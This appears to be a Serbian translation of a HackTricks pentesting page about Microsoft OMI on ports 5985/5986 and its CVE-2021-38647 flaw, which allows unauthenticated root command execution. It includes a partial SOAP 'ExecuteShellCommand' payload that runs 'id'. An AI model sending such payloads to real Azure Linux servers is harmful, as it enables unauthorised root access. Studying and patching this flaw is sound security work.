Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md
Translator workflow 6c06826974 Translated to Serbian
2024-02-10 13:11:20 +00:00

4.5 KiB
Raw Blame History

5985,5986 - Pentesting OMI

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Osnovne informacije

OMI je predstavljen kao open-source alat od strane Microsoft-a, dizajniran za daljinsko upravljanje konfiguracijom. Posebno je relevantan za Linux servere na Azure-u koji koriste usluge kao što su:

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

Proces omiengine se pokreće i osluškuje na svim interfejsima kao root kada se ove usluge aktiviraju.

Podrazumevani portovi koji se koriste su 5985 (http) i 5986 (https).

CVE-2021-38647 Vulnerability

Kako je primećeno 16. septembra, Linux serveri koji su implementirani na Azure-u sa pomenutim uslugama su podložni ranjivosti zbog ranjive verzije OMI-ja. Ova ranjivost se nalazi u obradi poruka OMI servera putem /wsman endpointa bez zahteva za Authentication header-om, nepravilno autorizujući klijenta.

Napadač može iskoristiti ovo slanjem "ExecuteShellCommand" SOAP payload-a bez Authentication header-a, prisiljavajući server da izvrši komande sa root privilegijama.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Za više informacija o ovoj CVE proverite ovde.

Reference

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!